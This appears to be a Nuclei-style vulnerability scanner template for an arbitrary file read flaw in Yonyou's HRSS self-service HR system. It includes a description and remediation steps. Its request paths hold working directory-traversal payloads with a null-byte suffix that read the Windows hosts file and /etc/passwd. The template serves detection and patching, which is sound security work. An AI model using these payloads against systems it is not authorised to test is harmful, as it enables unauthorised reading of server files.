id: wooyun-2015-096676
info:
  name: Yonyou HRSS Self-Service System Arbitrary File Read Vulnerability
  author:
  - 折跃
  description: "Yonyou e-HR HRSS Self-Service System Arbitrary File Read Vulnerability\nYonyou HRSS Self-Service System provides a channel for managers and regular employees at all levels to participate in enterprise management, realizing an HR management model with full participation across the group; it is the window of HR services and a platform for HR management and communication.
    \n\nYonyou HRSS Self-Service System has an arbitrary file read vulnerability. Attackers can exploit it to read arbitrary files."
  severity: medium
  remediation: |-
    Official remediation:
    1. It is recommended that users obtain the latest patch or the latest version of the program from the vendor:
    https://www.yonyou.com/

    Temporary remediation:
    1. Filter "." so that users cannot navigate to parent directories from URLs.
    2. Strictly validate the format of user input parameters with regular expressions, hardcode or uniformly encode the filename parameters passed by users, whitelist file types, and reject parameters containing malicious or empty characters.
    3. Disable directory traversal services; for example, configure open_basedir in php.ini to restrict the file access scope.
    4. Store file paths in the database and allow users to download files by submitting the corresponding file ID.
    5. Verify user permissions before file downloads.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(all_headers,'const.js')
  path:
  - '{{BaseURL}}/hrss/dorado/smartweb2.loadConst.d?language=zh&country=\..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts%00.html'
  - '{{BaseURL}}/hrss/dorado/smartweb2.loadConst.d?language=zh&country=\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd%00.html'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
